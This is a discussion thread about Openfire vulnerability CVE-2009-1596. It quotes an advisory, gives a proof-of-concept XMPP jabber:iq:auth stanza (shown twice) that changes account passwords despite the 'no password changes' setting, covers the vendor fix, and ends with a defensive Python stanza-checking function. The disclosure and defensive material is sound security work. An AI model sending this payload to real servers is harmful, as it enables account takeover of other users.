Openfire vulnerability CVE-2009-1596

Hello,

It looks like all Openfire versions are affected by a reported vulnerability described below:

**Openfire No-Password-Changes Security Bypass**

A vulnerability has been reported in Openfire, which can be exploited by malicious users to bypass certain security restrictions.

The vulnerability is caused due to Openfire not properly respecting the “no password changes” setting, which can be exploited to change passwords by sending jabber:iq:auth “passwd_change” requests to the server.
CVE-2009-1596

Authentication

High. Exploiting this issue can allow the attacker to gain unauthorized access to the affected application and to completely compromise victims’ accounts.

Moderate. The following example data is sufficient to trigger this issue:

<iq type='set' id='passwd_change'>
<query xmlns='jabber:iq:auth'>
<username>test2</username>
<password>newillegalychangedpassword</password>
</query>
</iq>

The vendor has released an update:
http://www.igniterealtime.org/projects/openfire/index.jsp

212.8.163.209

Here’s the proof of concept code:



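<iq type='set' id='passwd_change'>
<query xmlns='jabber:iq:auth'>
<username>test.user</username>
<password>newillegalychangedpassword</password>
</query>
</iq>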

Do you know if there’s any patch available to fix this? If not, we might have to shut down our corporate server until it’s fixed.

Regards,

Alpha.

The vulnerability report as presented on NVD links to our JIRA issue that tracks this problem: OF-221. It has been resolved and will be included in the next release (3.6.5) of Openfire.

Is there any timeline for 3.6.5 release or any workaround in the meantime?

Hello,

There is no workaround as this change was required to support it:

change 11136

The more dangerous exploit was fixed in 3.6.4, where you could change the password of any user and not just yourself.

daryl
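
The two checks discussed in this thread (the "no password changes" setting, and the cross-user change fixed in 3.6.4) can be sketched as a policy function, for example in a filtering proxy or a log review script. This is an added example, not Openfire code and not from any poster; `check_passwd_change`, its parameters and the sample stanza are hypothetical and constructed for illustration.

```python
import xml.etree.ElementTree as ET

AUTH_NS = "jabber:iq:auth"

def _local(tag):
    """Strip any '{namespace}' prefix so 'iq' matches with or without jabber:client."""
    return tag.rsplit("}", 1)[-1]

def check_passwd_change(stanza_xml, session_user, allow_password_change):
    """Decide whether one stanza, received on an ALREADY authenticated session,
    may proceed. Returns (allowed, reason). Assumption: the caller knows the
    session's user name and the server's password-change setting."""
    try:
        iq = ET.fromstring(stanza_xml)
    except ET.ParseError:
        return False, "malformed stanza"
    if _local(iq.tag) != "iq" or iq.get("type") != "set":
        return True, "not an iq set"
    query = iq.find(f"{{{AUTH_NS}}}query")
    if query is None:
        return True, "not jabber:iq:auth"
    if query.find(f"{{{AUTH_NS}}}password") is None:
        return True, "no password element"
    # Check 1: the administrator's "no password changes" setting must win.
    if not allow_password_change:
        return False, "password changes disabled"
    # Check 2: a user may only change their own password.
    target = (query.findtext(f"{{{AUTH_NS}}}username") or "").strip().lower()
    if target and target != session_user.strip().lower():
        return False, "target user differs from session user"
    return True, "ok"

# Constructed sample input, same shape as the stanza quoted in the thread.
SAMPLE = (
    "<iq type='set' id='passwd_change'>"
    "<query xmlns='jabber:iq:auth'>"
    "<username>test2</username>"
    "<password>constructed-sample-password</password>"
    "</query></iq>"
)

if __name__ == "__main__":
    for user, allowed in (("test2", False), ("alice", True), ("test2", True)):
        print(user, allowed, check_passwd_change(SAMPLE, user, allowed))
```
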